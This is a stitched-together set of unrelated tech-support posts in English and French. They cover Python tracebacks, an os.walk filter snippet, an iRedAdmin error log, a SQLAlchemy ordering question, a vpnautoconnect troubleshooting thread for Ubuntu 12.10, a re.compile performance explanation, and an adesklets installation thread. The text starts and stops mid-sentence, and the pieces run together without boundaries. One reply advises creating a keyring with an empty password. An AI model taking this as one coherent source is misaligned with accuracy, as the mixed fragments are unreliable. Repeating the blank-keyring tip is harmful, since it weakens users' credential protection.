"usr/lib/python2.4/site-packages/adesklets/commands_handler.py", line 103, in out adesklets.error_handler.ADESKLETSError: adesklets command error - font 'VeraBd/8' could not be loaded Exception exceptions.AttributeError: "Events instance has no attribute 'comm'" in <bound method Events.__del__ of <__main__.Events instance at 0xb7be578c>> ignored Hors ligne
You can use os.walk to iterate over each file, apply your custom filtering function and copying over only the ones you care. os.walk(top[, topdown=True[, onerror=None[, followlinks=False]]]) Generate the file names in a directory tree by walking the tree either top-down or bottom-up. For each directory in the tree rooted at directory top (including top itself), it yields a 3-tuple (dirpath, dirnames, filenames). You can add all copied files to a list and use it to run you custom script or run the script after each copy operation. This should get you started: import os def filterls(src, filter_func): for root, dirs, files in os.walk(src): for f in files: if filter_func(f): path = os.path.join(root, f) yield path[len(src)+1:] It takes a path to a directory and a function which takes a single parameter. If the function returns False for the passed filename, the file is ignored. You can try it in a python interpreter like this: # Get a list of all visible files rooted in the 'path/to/the/dir' directory print list(filterls('path/to/the/dir', lambda p: not p.startswith('.')))
Topic: Error 500, Upgrading from OpenSource to Pro Hi Guys ! Finaly i buyed this Masterpiece of Mailserver and now i upgraded to iRedAdmin Pro. Used the guide from Zhang. in my apache log i get this error: [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] mod_wsgi (pid=3289): Target WSGI script '/usr/share/apache2/iredadmin/iredadmin.py' cannot be loaded as Python module. [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] mod_wsgi (pid=3289): Exception occurred processing WSGI script '/usr/share/apache2/iredadmin/iredadmin.py'. [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] Traceback (most recent call last): [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] File "/usr/share/apache2/iredadmin/iredadmin.py", line 28, in <module> [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] from libs import iredbase [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] File "/usr/share/apache2/iredadmin/libs/iredbase.py", line 53, in <module> [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] webmaster = cfg.general.get('webmaster', 'root') [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] File "/var/lib/python-support/python2.5/web/utils.py", line 68, in __getattr__ [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] raise AttributeError, k [Thu Oct 07 13:31:22 2010] [error] [client 80.123.169.178] AttributeError: 'general' Sry for my english, but i think everyone understand my problem kr Franky ---- Urgent issue? Pay iRedMail developer to solve it remotely at $39.
Models from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import Column, ForeignKey from sqlalchemy import Integer from sqlalchemy import Unicode from sqlalchemy import TIMESTAMP from sqlalchemy.orm import relationship BaseModel = declarative_base() class Base(BaseModel): __tablename__ = 'base' id = Column(Integer, primary_key=True) location = Column(Unicode(12), ForeignKey("locationterrain.location"), unique=True,) name = Column(Unicode(45)) ownerid = Column(Integer,ForeignKey("player.id")) occupierid = Column(Integer, ForeignKey("player.id")) submitid = Column(Integer,ForeignKey("player.id")) updateid = Column(Integer,ForeignKey("player.id")) owner = relationship("Player", primaryjoin='Base.ownerid==Player.id', join_depth=3, lazy='joined') occupier= relationship("Player", primaryjoin='Base.occupierid==Player.id', join_depth=3, lazy='joined') submitter = relationship("Player", primaryjoin='Base.submitid== Player.id', join_depth=3, lazy='joined') updater= relationship("Player", primaryjoin='Base.updateid== Player.id', join_depth=3, lazy='joined') class Player(BaseModel): __tablename__ = 'player' id = Column(Integer, ForeignKey("guildmember.playerid"), primary_key=True) name = Column(Unicode(45)) Searching bases = dbsession.query(Base) bases = bases.order_by(Base.owner.name) This doesn't work .... I've searched everywhere and read the documentation. But I just don't see how I can sort my (Base) query on their 'owner' relationship's name. It always results in: AttributeError: Neither 'InstrumentedAttribute' object nor 'Comparator' object has an attribute 'name' This must be easy... but I don't see it. Also looked into Comparators, which seemed logical, but I don't see where the query part for the ORDER BY is generated or what I should be returning since everything is generated dynamically. And making a comparator for each of my 'player' relationships to do a simple thing seems over complicated.
mastergb Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Bonjour à tous, Suite à l'énorme thread précédent (et à la demande de ljere) , j'aimerais reprendre un sujet vraiment dédié a vpnautoconnect. Le logiciel n'est plus à présenter. On l'aime (ou pas), il permet entre autre de répondre à une lacune du network manager et un besoin grandissant : l'anonymat. Attention: Il ne vous permet pas d'être anonyme mais ameliore juste une fonctionnalité déjà présente sur votre ubuntu préféré. J'essaierais de répondre un maximum aux diverses questions et bugs que vous allez pouvoir me communiquer. Il y a parfois des gens qui répondent parfaitement aux question posés comme bhubuntu. Je ne trouve pas l’intérêt de rajouter quelque chose quand la question est parfaitement traitée par un autre membre du forum mais ça ne veut pas dire que je n'ai pas pris la peine de vous lire. Je suis actuellement overbooké professionnellement mais je vais quand même essayer de dégager du temps pour essayer maintenir un développement régulier. N'oubliez surtout pas de compléter vpnautoconnect avec un firewall bien configuré: Il ne faut pas oublier qu'un VPN est un réseau local. Votre box ne vous protège plus. Voila pour les présentations je passe aux nouvelles: Je tourne actuellement sur vpnautoconnect 2.2 avec beaucoup de codes réécris. J'ai actuellement un problème avec apparmor (mais de toute façon les anciennes versions l'ont également). Vu le lot de problèmes grandissant je vais donc sortir la 2.2 avant la fin de la semaine. Dernière modification par mastergb (Le 27/11/2012, à 22:14) Hors ligne ljere Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) bonjour je repose donc ma question à quoi sert cette ligne dans la conf AddrToPingIfDNSDown=198.41.0.4,192.33.4.12 faut-il la modifier? Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Bonjour, Heureux de trouver ici un sujet dédié à vpnautoconnect. Bonne initiative en tous cas que de créer un nouveau fil ici même, l'ancien commençait à peser avec ses 30 pages de lecture... Actuellement, je suis sous Ubuntu 12.10 depuis peu et vpnautoconnect ne fonctionne plus malheureusement... J'ai donc désinstallé complètement Vpnautoconnect puis réinstallé celui-ci. (v2.1) Il se lance bien au démarrage et l'icône apparait dans le systray. Jusque là normal, mais lorsque j'ouvre les "préférences" pour y cocher "suivre le parent et reconnecter", ou y ajouter un vpn, rien n'est enregistré après avoir cliqué sur "sauver"... C’est-à-dire que si je rouvre les préférences, tout a disparu ! marc@ubuntu:~$ cat /var/log/syslog | grep "vpnautoconnect" Dec 7 09:04:19 ubuntu AptDaemon: INFO: CommitPackages() was called: dbus.Array([dbus.String('vpnautoconnect')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')) Dec 7 09:04:19 ubuntu AptDaemon.Worker: INFO: Committing packages: dbus.Array([dbus.String('vpnautoconnect')], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')) Dec 7 09:04:32 ubuntu AptDaemon: INFO: InstallFile() was called: /home/marc/Desktop/vpnautoconnect_2.1.0ubuntu5_i386.deb Dec 7 09:04:39 ubuntu AptDaemon.Worker: INFO: Installing local package file: /home/marc/Desktop/vpnautoconnect_2.1.0ubuntu5_i386.deb Dec 7 09:04:43 ubuntu AptDaemon.Worker: INFO: Installing local package file: /home/marc/Desktop/vpnautoconnect_2.1.0ubuntu5_i386.deb Dec 7 09:28:39 ubuntu named[1647]: error (network unreachable) resolving 'vpnautoconnect.svn.sourceforge.net/A/IN': 2001:500:94:1::3#53 Dec 7 09:38:46 ubuntu AptDaemon: INFO: CommitPackages() was called: dbus.Array([dbus.String('vpnautoconnect')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')), dbus.Array([dbus.String('')], signature=dbus.Signature('s')) Dec 7 09:38:46 ubuntu AptDaemon.Worker: INFO: Committing packages: dbus.Array([dbus.String('vpnautoconnect')], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')), dbus.Array([], signature=dbus.Signature('s')) Dec 7 09:38:54 ubuntu AptDaemon: INFO: InstallFile() was called: /home/marc/Desktop/vpnautoconnect_2.1.0ubuntu5_i386.deb Dec 7 09:39:00 ubuntu AptDaemon.Worker: INFO: Installing local package file: /home/marc/Desktop/vpnautoconnect_2.1.0ubuntu5_i386.deb Dec 7 09:39:05 ubuntu AptDaemon.Worker: INFO: Installing local package file: /home/marc/Desktop/vpnautoconnect_2.1.0ubuntu5_i386.deb Puis-je installer la v2.2 sous 12.10 ou dois-je forcer la version 2.1oubuntu4 comme indiqué sur cette page ? (Quantal) https://launchpad.net/~barraudmanuel/+a … /+packages Vos suggestions sont les bienvenues. "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne lynn Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Le ppa de Manu n'a peut-être pas été poussé sous quantal. ( je suis encore sous precise ). Il faut que tu modifies la source, soit par synaptic, soit en éditant le fichier concerné. gksudo gedit /etc/apt/sources.list.d/barraudmanuel-vpnautoconnect-quantal.list Remplaces quantal par precise. Ensuite, sudo apt-get update && sudo apt-get upgrade Normalement, une mise à jour vers la version 2.2 devrait être proposée. Linux est la solution ! Au fait, c'est quoi ton problème ? Ubuntu 14.04 - 64 bits - Ubuntu 14.10 - 64 bits - Utopic Unicorn Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) @ lynn J'avais déjà modifié le dépôt, et rechargé mais aucune mise à jour proposée concernant vpnautoconnect. "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne lynn Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) C'est curieux ça ! Quand la nouvelle version est sortie, moi je l'ai eu tout de suite via le gestionnaire de mises à jour... Tu as essayé de faire le ménage en désinstallant complètement tout ce qui concerne vpnautoconnect ainsi que son ppa ? Juste après avoir fait ça : sudo apt-get autoremove && sudo apt-get autoclean && sudo apt-get clean Maintenant, tu ajoutes le ppa disponible ici et installes vpnauconnect pour repartir sur une base propre. Logiquement, tu devrais avoir la version 2.2... sinon je ne vois pas ce qui peut empêcher cette version de s'installer chez toi. Linux est la solution ! Au fait, c'est quoi ton problème ? Ubuntu 14.04 - 64 bits - Ubuntu 14.10 - 64 bits - Utopic Unicorn Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Bonjour, Force est de constater qu'aucune version ne semble fonctionner sous 12.10 Quantal... (versions 32 bits 2.1Oubuntu.4_i386 ; idem 2.1.5 et 2.2.2) Soit j'ai droit à "Le daemon ne répond pas, le programme va se terminer automatiquement", ou lorsque le lancement réussi après reboot, aucune connexion et tous les champs dans "préférences" sont vides. De plus, si l'on tente de modifier ou ajouter des valeurs, rien n'est mémorisé après avoir "sauver". C'est à dire qu'à la réouverture, tous les champs sont de nouveau vides... C'est curieux ça ! Quand la nouvelle version est sortie, moi je l'ai eu tout de suite via le gestionnaire de mises à jour... Idem chez moi, la v2.2.2 mais alors j'étais sous 12.04. Personne qui utilise la 12.10 et vpnautoconnect ? Actuellement, lancement du vpn manuellement en espérant que la connexion ne tombe pas... "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Personne n'utilise vpnautoconnect sous 12.10 actuellement ? J'aimerais bien comparer vos expériences, afin d'essayer de comprendre ce qui se passe avec cette nouvelle version.d'Ubuntu. Pour le moment, c'est connexion vpn manuelle via networkmanager et firewall maison. (merci manu pour son aide précieuse) "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne lynn Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) @Ansuz J'ai installé Ubuntu 12.10 sous VirtualBox pour tester vpnautoconnect. Le daemon se lance bien, l'icône est bien présente dans le systray ( après avoir ajouté "vpnautoconnect" dans "application au démarrage" ) mais aucune connexion automatique malgré tous les paramètres correctement renseignés. Ca a été résolu en supprimant la demande du mot de passe du trousseau de clé ( seahorse ). Linux est la solution ! Au fait, c'est quoi ton problème ? Ubuntu 14.04 - 64 bits - Ubuntu 14.10 - 64 bits - Utopic Unicorn Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Donc, de façon virtuelle ça fonctionne avec vpnautoconnect v2.2 sous 12.10 ? De mon côté impossible d'enregistrer la moindre valeur dans préférences... Rien n'est sauvegardé. Ca a été résolu en supprimant la demande du mot de passe du trousseau de clé ( seahorse ) Peux-tu m'en dire plus la dessus ? "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne lynn Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Peux-tu m'en dire plus la dessus ? J'ai commencé par viré les fichiers .keyring dans ~/.local/share/keyrings ensuite, j'ai lancé seahorse et avec le "+" en haut à gauche, "trousseau de mot de passe", tu le nommes comme tu veux et à la proposition du mot de passe, tu laisses vide. Redémarres ta session ou ton pc et normalement, ça devrait fonctionner. Linux est la solution ! Au fait, c'est quoi ton problème ? Ubuntu 14.04 - 64 bits - Ubuntu 14.10 - 64 bits - Utopic Unicorn Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) @ lynn J'avoue avoir du mal à appréhender le rapport entre seahorse et le lancement de vpnautoconnect. Comment ce fait-il que ça fonctionnait parfaitement jusqu'à la 12.10 ? (Je n'ai rien modifié du point de vue autorisation, mot de passe...) Le souci, c’est que je n'est pas de fichiers keyrings dans ~/.local/share. Par contre, j'ai un dossier dans /usr/share/keyrings (est-ce celui-ci dont tu parles ? n'y a t-il aucun risque à le supprimer ?) J'ai bien créé un nouveau trousseau suivant tes conseils, mais aucun changement... L’icône de vpnautoconnect et bien lancée dans le systray, mais il m'est toujours impossible d'ajouter ou modifier la moindre valeur dans "préférences" qui demeure désespérément vide ! (le bouton "sauver" ne sauvegarde rien) "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne lynn Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) @Ansuz As-tu le fichier appelé "config" situé dans ~/.vpnautoconnect ? Linux est la solution ! Au fait, c'est quoi ton problème ? Ubuntu 14.04 - 64 bits - Ubuntu 14.10 - 64 bits - Utopic Unicorn Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) A priori, non. "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne lynn Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Crées un fichier "config" nano ~/.vpnautoconnect/config et insères ce qui suit en adaptant les deux dernières lignes à ta configuration #VPNAutoconnect Config [global] FollowReconnectParent=yes reconnectAfterDisconnectManual=no HostToPing=google.fr AddrToPingIfDNSDown=198.41.0.4,192.33.4.12 scriptEvenement= TimeoutBeforeSwitch=15 [openvpn-de] # à modifier suivant ton fournisseur vpn connectionSupport=Connexion filaire 1 # à modifier suivant ton interface réseau Linux est la solution ! Au fait, c'est quoi ton problème ? Ubuntu 14.04 - 64 bits - Ubuntu 14.10 - 64 bits - Utopic Unicorn Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Merci lynn pour ton aide et la patience dont tu fais preuve. Fichier "config" ok, mais toujours au point mort. Aucun changement... comment ce fait-il que les champs dans préférences restent définitivement vides malgré tout ??? Ça commence à devenir désespérant, personne n'utilise vpnautoconnect sous 12.10 ? "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) @ lynn C'est exactement ça, dans cette fenêtre, tous les champs sont vides malgré le fichier config, rien n'est sauvegardé si je rentre ou modifie des valeurs. A la réouverture, tout à disparu... Idem si je rentre un vpn. "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne gregolak Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Bonjour, je viens d'installer ubuntu 12.04 64bits, et plus possible de faire fonctionner vpnautoconnect. J'ai la dernière version du ppa (2.2.0), lorsque je le lance il ne se passe rien. Idem avec le flag --nounity (j'utilise Gnome). J'ai essayé d'installer la 2.0.4-1ubuntu1_no_unity_amd64 au cas où, pas mieux... (au passage ça n'a dans doute rien à voir mais network-manager ne connecte plus automatiquement le VPN malgré la case "connecter automatiquement" cochée) Merci d'avance ! Hors ligne mastergb Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Bonjour à tous. Je prend juste connaissance su problème avec quantal. Je ne suis pas encore passé dessus donc je n'ai pas pu voir les problèmes (peut être uniquement un problème de lib) Je vais regarder ce week end. Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Merci manu, ça fait plaisir de te revoir parmi nous ! Je commençais à désespérer obtenir une solution pour Quantal. Au plaisir de te lire... "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne mastergb Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Bonjour, Je viens de migrer une de mes machines sous quantal (non pas sans mal ) Aucun problème concernant vpnautoconnect. IL faut vraiment que je vois précisement avec toi ansuz. (session SSH, + version vpnautoconnect avec symbol de deboggage +gdb). Il faudra environ une petite demi heure. Voila dis moi tes dispos par mail ou skype. Dernière modification par mastergb (Le 22/12/2012, à 11:37) Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Salut manu, Je t'ai envoyé un mail, mais il va falloir me rappeler la marche à suivre. (session SSH, + version vpnautoconnect avec symbol de deboggage +gdb) ... "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne Ansuz Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Salut à tous, Bien, après deux échanges en live avec mastergb, tout semble rentré dans l'ordre. Non sans mal il faut dire... en effet quantal donne pas mal de fil à retordre aux développeurs tel que mastergb. Qu'il soit ici remercié comme il se doit, pour son dévouement hors pair, sa patience sans limites et ses compétences hors-norme dans le domaine... Force est de constater que vpnautoconnect fonctionne de nouveau sous quantal, après pas mal d'efforts. (de sa part) Mais je préfère laisser la plume à mastergb, afin qu'il nous explique lui-même ce qui clochait sur ma machine. J'en serais moi-même incapable, rendons à césar ce qui appartient à césar Dès qu'il passera par ici. Merci Manu! "Mieux vaut ne rien savoir que beaucoup savoir à moitié !" Friedrich Nietzsche Hors ligne lynn Re : Vpnautoconnect 2.X(Nouvelle version ,bugs, demande d'aide: c'est ici!) Bonjour, Il y'a quelques minutes, je viens d'avoir une mise à jour de vpnautoconnect et depuis ça ne fonctionne plus... Une fenêtre s'ouvre : Le daemon ne répond pas le programme va se fermer automatiquement Apparemment, lvpnc ne se lance plus. Ca fonctionnait avec la version précédente. Ubuntu 12.10 64 bits. Si tu passes par là Manu Edit : En lançant lvpnc dans un terminal et en regardant dans le moniteur système, on voit que lvpnc se lance et se ferme aussitôt. Par contre, si je lance lvpnc en mode root via le terminal sudo lvpnc lvpnc se lance et reste mais la reconnexion automatique en cas de coupure vpn ne fonctionne pas... Dernière modification par lynn (Le 27/12/2012, à 13:32) Linux est la solution ! Au fait, c'est quoi ton problème ? Ubuntu 14.04 - 64 bits - Ubuntu 14.10 - 64 bits - Utopic Unicorn Hors ligne
I agree with Honest Abe that the match(...) in the given examples are different. They are not a one-to-one comparisons and thus, outcomes are vary. To simplify my reply, I use A, B, C, D for those functions in question. Oh yes, we are dealing with 4 functions in re.py instead of 3. Running this piece of code: h = re.compile('hello') # (A) h.match('hello world') # (B) is same as running this code: re.match('hello', 'hello world') # (C) Because, when looked into the source re.py, (A + B) means: h = re._compile('hello') # (D) h.match('hello world') and (C) is actually: re._compile('hello').match('hello world') So, (C) is not the same as (B). In fact, (C) calls (B) after calling (D) which is also called by (A). In other words, (C) = (A) + (B). Therefore, comparing (A + B) inside a loop has same result as (C) inside a loop. George's regexTest.py proved this for us. noncompiled took 4.555 seconds. # (C) in a loop compiledInLoop took 4.620 seconds. # (A + B) in a loop compiled took 2.323 seconds. # (A) once + (B) in a loop Everyone's interest is, how to get the result of 2.323 seconds. In order to make sure compile(...) only get called once, we need to store the compiled regex object in memory. If we are using a class, we could store the object and reuse when every time our function get called. class Foo: regex = re.compile('hello') def my_function(text) return regex.match(text) If we are not using class (which is my request today), then I have no comment. I'm still learning to use global variable in Python, and I know global variable is a bad thing. One more point, I believe that using (A) + (B) approach has an upper hand. Here are some facts as I observed (please correct me if I'm wrong): Calls A once, it will do one search in the _cache followed by one sre_compile.compile() to create a regex object. Calls A twice, it will do two searches and one compile (because the regex object is cached). If the _cache get flushed in between, then the regex object is released from memory and Python need to compile again. (someone suggest that Python won't recompile.) If we keep the regex object by using (A), the regex object will still get into _cache and get flushed somehow. But our code keep a reference on it and the regex object will not be released from memory. Those, Python need not to compile again. The 2 seconds differences in George's test compiledInLoop vs compiled is mainly the time required to build the key and search the _cache. It doesn't mean the compile time of regex. George's reallycompile test show what happen if it really re-do the compile every time: it will be 100x slower (he reduced the loop from 1,000,000 to 10,000). Here are the only cases that (A + B) is better than (C): If we can cache a reference of the regex object inside a class. If we need to calls (B) repeatedly (inside a loop or multiple times), we must cache the reference to regex object outside the loop. Case that (C) is good enough: We cannot cache a reference. We only use it once in a while. In overall, we don't have too many regex (assume the compiled one never get flushed) Just a recap, here are the A B C: h = re.compile('hello') # (A) h.match('hello world') # (B) re.match('hello', 'hello world') # (C) Thanks for reading.
tomtom Re : [HOW TO] adesklets : installation sous Ubuntu Breezy raaah ! j'ai un probleme d'interpreteur python ! J'ai installé toutes les librairies via synaptic et adesklets aussi. J'ai DL YAB (Yet Another Bar) et j'ai ca : [i]tomtom@barad-luin:/mnt/config/programmes/adesklets/yab-0.0.2$ [/i][b]ls -l[/b] total 56 -rw-r--r-- 1 tomtom tomtom 1624 2005-02-25 08:45 config.txt.minimal -rw-r--r-- 1 tomtom tomtom 15145 2005-02-25 08:45 COPYING -rw-r--r-- 1 tomtom tomtom 2523 2005-02-25 08:45 GNUmakefile drwxr-xr-x 2 tomtom tomtom 192 2005-02-25 08:45 icons -rw-r--r-- 1 tomtom tomtom 1137 2005-02-25 08:45 README -rwxr-xr-x 1 tomtom tomtom 26564 2005-02-25 08:45 yab.py [i]tomtom@barad-luin:/mnt/config/programmes/adesklets/yab-0.0.2$[/i][b] ./yab.py[/b] bash: ./yab.py: /usr/bin/env: bad interpreter: Permission non accordée [i]tomtom@barad-luin:/mnt/config/programmes/adesklets/yab-0.0.2$[/i] Pourtant, j'ai installé toutes les librairies !! Mais j'ai le meme problème d'interpreteur pour perl et j'ai pas réussi a régler le problème. Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Alors, pour Bismut : l'endroit où tu places les fichiers que tu télécharges, décompresses, compiles n'a pas vraiment d'importance, vu que tout ce petit monde ne te seras plus utile une fois que l'installation se sera bien passée (tu pourras tout supprimer). J'ai donné l'exemple du home parce que ça me parraît plus simple et plus logique mais rien ne t'empêche de tout mettre dans un répertoire temp ou autre (il faut juste que tu adaptes tes commandes en fonction). Pour les liens symboliques, c'est Rapass qui a proposé cette solution (mais il y en a sans doute une autre plus propre mais on a pas trouvé). Pour Sallé, est-ce que ça le fait pour tous les desklets ? Peux-tu en lancer un totalement en console et préciser les messages qui s'affichent, je veux dire en faisant cd /chemin_vers_ton_desklet./nom_du_desklet Dernière modification par toma222 (Le 24/11/2005, à 12:52) Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy tomtom, je suis étonné par le chemin que tu as mis pour tes desklets (/mnt/....). As-tu essayé de les mettre dans ton home ? Ca pourrait expliquer le permission non accordées. Hors ligne tomtom Re : [HOW TO] adesklets : installation sous Ubuntu Breezy eh oui ! c'était ca! eh ben!! Merci ! Comment ca se fais que ca ne marche pas si on le met dans un /mnt/...? Dernière modification par tomtom (Le 24/11/2005, à 13:40) Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Sans doute un problème de droits mais je ne peux pas t'en dire plus... Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy hello, (Rapass) ... justement j'ai les deux paquets d'installer mais ca marche pas dpkg -l | grep imlib ii gdk-imlib1 1.9.14-16.2ubuntu4 imaging library for use with gtk (usin libp ii imlib-base 1.9.14-16.2ubuntu4 Common files needed by the Imlib/Gdk-I ib p ii imlib-progs 1.9.14-16.2ubuntu4 Configuration program for Imlib and GD Imli ii imlib2-demo 1.2.1.004-1 Imlib2 demo's ii imlib2-loaders 1.2.1.004-1 Additional loaders for Imlib2 ii imlib2-test 1.2.1.004-1 Imlib2 test programs ii libimlib2 1.2.1.004-1 Powerful image loading and rendering l rary ii libimlib2-dev 1.2.1.004-1 Imlib2 headers, static libraries and d umen Hors ligne Rapass Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Je te met le résultat de la même commande chez moi : rapass@maison:~$ dpkg -l | grep imlib ii gdk-imlib1 1.9.14-16.2ubuntu4 imaging library for use with gtk (using libp ii imlib-base 1.9.14-16.2ubuntu4 Common files needed by the Imlib/Gdk-Imlib p ii imlib-progs 1.9.14-16.2ubuntu4 Configuration program for Imlib and GDK-Imli ii imlib1 1.9.14-16.2ubuntu4 imaging library for X and X11 (using libpng2 ii imlib1-dev 1.9.14-16.2ubuntu4 Header files needed for Imlib development (u ii imlib11 1.9.14-17.1 Imlib is an imaging library for X and X11 ii libimlib2 1.2.0-2.2ubuntu2 powerful image loading and rendering library ii libimlib2-dev 1.2.0-2.2ubuntu2 Imlib2 development files Je ne sais pas lequel c'est... Mais ça doit etre dans ceux-la, il faut les tester un par un Dernière modification par Rapass (Le 24/11/2005, à 14:33) Il existe 10 sortes de personnes : celles qui connaissent le binaire, et les autres. Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy ca y est ca marche, par contre je sais plus trop cke j'ai fait mais je vais vous dire ca ...... c en train de compiler Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy alors, j'ai installer les lib suivants : sudo apt-get install libfontconfig1-dbg libfontconfig1-dev libxft-dev libxft2 libxft2-dbg libftdi0 et ca marche !! Hors ligne Rapass Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Chez moi je n'ai pas les paquets suivants : - libfontconfig1-dbg - libxft-dev - libxft2-dbg - libftdi0 Je suppose donc qu'ils ne sont pas liés à la résolution du problème... Je pense à libfontconfig1-dev, je me rappelle l'avoir mis pour enlever un message d'avertissement Il existe 10 sortes de personnes : celles qui connaissent le binaire, et les autres. Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Moi j'ai seulement libfontconfig1-dev, libxft2, libxft-dev d'installés. C'est fou le nombre de paquets nécessaires, je me souvenais pas qu'il y en avait autant ! Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy en fait, je pense que libxft est néccessaire pour imlib. Et vu qu'au début, je pensais que c'etait imlib qui était mal installé, donc je voulais le compiler. Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Bon bah chez moi ça marche bien Par contre, j'ai installé yab, et j'ai un problème: il ouvre deux barre alors que je n'en veux qu'une Quelqu'un peut me dire ce qu'il faut modifier dans le config ? Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Si tu fais clic-droit quitter sur la barre que tu veux enlever elle réapparaît au lancement suivant ? Sinon tu peux aller voir dans le fichier .adesklets de ton home (fichier caché) combien tu as de barre d'enregistrées. Dernière modification par toma222 (Le 24/11/2005, à 19:40) Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Hum... J'ai l'impression que ça ne revient pas, pourtant tout à l'heure... oO Enfin, je suis fatigué Merci Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Par contre, j'ai essayé 3-4 autres desklets, et aucun ne marche: rien ne se lance Faut que je m'en tienne là et que je jete mon pourtable par la fenêtre ou j'ai zappé un truc énorme ? Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Tu as bien installé libstatgrab et pystatgrab comme indiqué dans le tuto ? C'est quels desklets exactement qui ne veulent pas se lancer ? Si tu les lances avec le terminal (pas en double cliquant dessus), tu as des messages d'erreurs ? Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy J'ai bien suivi le tuto et installé ces librairies en suivant le tuto. Quand je lance le .py, il me demande ssi je veux le tester ou l'installer, et quoi que je réponde, la console se ferme et puis plus rien... Peut-être ai-je mal 